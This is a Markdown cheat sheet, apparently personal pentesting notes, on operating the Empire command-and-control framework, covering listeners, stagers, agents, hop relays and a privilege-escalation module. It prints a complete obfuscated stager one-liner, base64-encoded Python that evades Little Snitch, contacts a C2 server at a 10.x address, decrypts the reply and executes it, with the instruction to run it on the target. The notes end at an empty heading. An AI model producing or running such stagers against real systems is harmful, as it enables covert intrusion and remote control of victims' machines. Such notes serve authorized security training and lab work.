74 lines
2.7 KiB
Markdown
74 lines
2.7 KiB
Markdown
# Empire C2
|
|
|
|
## Parts
|
|
* Listeners
|
|
* Stagers, payloads generated, for example a reverse, delivery mechanism for agents
|
|
* Agents
|
|
* Modules use through agents
|
|
|
|
|
|
* Results are stored in a DB
|
|
|
|
## Commands
|
|
### uselistener
|
|
* Example
|
|
```sh
|
|
uselistener http
|
|
```
|
|
* msf like commands, run listener
|
|
```sh
|
|
set <option> <value>
|
|
options
|
|
execute
|
|
```
|
|
* go back to main menu
|
|
```sh
|
|
back
|
|
main
|
|
```
|
|
* Check `listeners`
|
|
* `kill <listener>`
|
|
|
|
### usestager
|
|
```sh
|
|
usestager multi/launcher
|
|
usestager multi/bash
|
|
```
|
|
* Set the listener created under `uselistener`
|
|
```sh
|
|
set Listener <Listener>
|
|
```
|
|
* `execute`, output is for example:
|
|
```sh
|
|
echo "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUpCm91dCwgZXJyID0gcHMuY29tbXVuaWNhdGUoKQppZiByZS5zZWFyY2goIkxpdHRsZSBTbml0Y2giLCBvdXQuZGVjb2RlKCdVVEYtOCcpKToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliLnJlcXVlc3Q7ClVBPSdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbyc7c2VydmVyPSdodHRwOi8vMTAuNTAuMTg0LjQ5OjgwMDAnO3Q9Jy9uZXdzLnBocCc7cmVxPXVybGxpYi5yZXF1ZXN0LlJlcXVlc3Qoc2VydmVyK3QpOwpwcm94eSA9IHVybGxpYi5yZXF1ZXN0LlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliLnJlcXVlc3QuYnVpbGRfb3BlbmVyKHByb3h5KTsKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKSwgKCJDb29raWUiLCAic2Vzc2lvbj16bWNwNFJXb3d1MU9majBEa0dQVkZaK0RKTUE9IildOwp1cmxsaWIucmVxdWVzdC5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIucmVxdWVzdC51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj1hWzA6NF07ZGF0YT1hWzQ6XTtrZXk9SVYrJ0NqT2cyUzpvbSp5PSg0YVs5LkBaVzNEP2ROTEdlez5CJy5lbmNvZGUoJ1VURi04Jyk7UyxqLG91dD1saXN0KHJhbmdlKDI1NikpLDAsW10KZm9yIGkgaW4gbGlzdChyYW5nZSgyNTYpKToKICAgIGo9KGorU1tpXStrZXlbaSVsZW4oa2V5KV0pJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQppPWo9MApmb3IgY2hhciBpbiBkYXRhOgogICAgaT0oaSsxKSUyNTYKICAgIGo9KGorU1tpXSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCiAgICBvdXQuYXBwZW5kKGNocihjaGFyXlNbKFNbaV0rU1tqXSklMjU2XSkpCmV4ZWMoJycuam9pbihvdXQpKQ=='));" | python3 &
|
|
```
|
|
* run this on the target
|
|
|
|
### agents
|
|
* `agents` checks the deployed agents
|
|
* `interact <AgentName>`
|
|
* `help` in interaction context
|
|
* `kill <AgentName>`
|
|
|
|
## Create Hop Listener
|
|
```sh
|
|
uselistener http_hop
|
|
```
|
|
```sh
|
|
set RedirectListener <ExistingListenerName>
|
|
```
|
|
```sh
|
|
set Host <IPofRelay>
|
|
```sh
|
|
set Port <PortonRelay>
|
|
```
|
|
* `execute` and check files under `/tmp/http_hop/news.php`, `/tmp/http_hop/admin/get.php`, `/tmp/http_hop/login/process.php`
|
|
|
|
* `usestager multi/handler`
|
|
* `set Listener http_hop`
|
|
* on Relay: `php -S 0.0.0.0:PORT &>/dev/null &`
|
|
|
|
* usemodule powershell/privesc/sherlock on agent for example
|
|
|
|
### Interactive shell
|